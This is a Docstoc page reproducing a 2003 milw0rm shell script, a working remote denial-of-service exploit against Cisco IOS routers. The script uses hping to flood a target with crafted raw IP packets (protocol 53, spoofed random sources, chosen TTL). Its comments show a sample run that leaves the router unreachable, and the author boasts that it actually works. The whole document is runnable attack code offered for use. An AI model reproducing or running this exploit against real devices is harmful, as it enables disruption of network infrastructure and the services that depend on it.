Docstoc

Cisco IOS using hping Remote Denial of Service Exploit

Document Sample
Cisco IOS using hping Remote Denial of Service Exploit Powered By Docstoc
					                                Cisco IOS using hping Remote Denial of Service Exploit                            Page 1/1
  1    #!/bin/tcsh −f
  2    #
  3    # Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
  4    # Vulnerable versions − all Cisco devices running IOS.
  5    # Requirements : tcsh, and hping.
  6    # Get hping @ www.hping.org
  7    #
  8    # And you know the best part? This script actually works! Unlike the few .c’s
  9    # floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
  10   # OR +s ciscodos.sh because of hping opening raw sockets.
  11   #
  12   # Example :
  13   #
  14   # root@evicted # ping 192.168.1.1
  15   # PING 192.168.1.1 (192.168.1.1): 56 data bytes
  16   # 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
  17   # 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
  18   # −−− 192.168.1.1 ping statistics −−−
  19   # 2 packets transmitted, 2 packets received, 0% packet loss
  20   # round−trip min/avg/max/std−dev = 0.817/1.052/1.287/0.235 ms
  21   #
  22   # root@evicted # ./ciscodos.sh 192.168.1.1 0
  23   # HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
  24   # −−− 192.168.1.1 hping statistic −−−
  25   # 19 packets tramitted, 0 packets received, 100% packet loss
  26   # round−trip min/avg/max = 0.0/0.0/0.0 ms
  27   # HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
  28   # −−− 192.168.1.1 hping statistic −−−
  29   # 19 packets tramitted, 0 packets received, 100% packet loss
  30   # round−trip min/avg/max = 0.0/0.0/0.0 ms
  31   # −−−−−−−−−−−−−SNIP−−−−−−−−−−−−−−−
  32   # root@evicted # ping 192.168.1.1
  33   # PING 192.168.1.1 (192.168.1.1): 56 data bytes
  34   # −−− 192.168.1.1 ping statistics −−−
  35   # 2 packets transmitted, 0 packets received, 100% packet loss
  36   # −−−−−−−−−−−−−SNIP−−−−−−−−−−−−−−−
  37   #
  38   # Coded by zerash@evicted.org
  39   #
  40
  41   if ($1 == "" || $2 == "") then
  42   echo "usage: $0 <router hostname|address> <ttl>"
  43   exit
  44   endif
  45
  46   foreach protocol (53)
  47   /usr/local/sbin/hping $1 −−rawip −−rand−source −−ttl $2 −−ipproto $protocol −−count 76 −−interval u250 −−data 26
  48   end
  49
  50   # milw0rm.com [2003−07−22]


zerash                                                                                                             07/22/2003

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:147
posted:5/23/2010
language:English
pages:1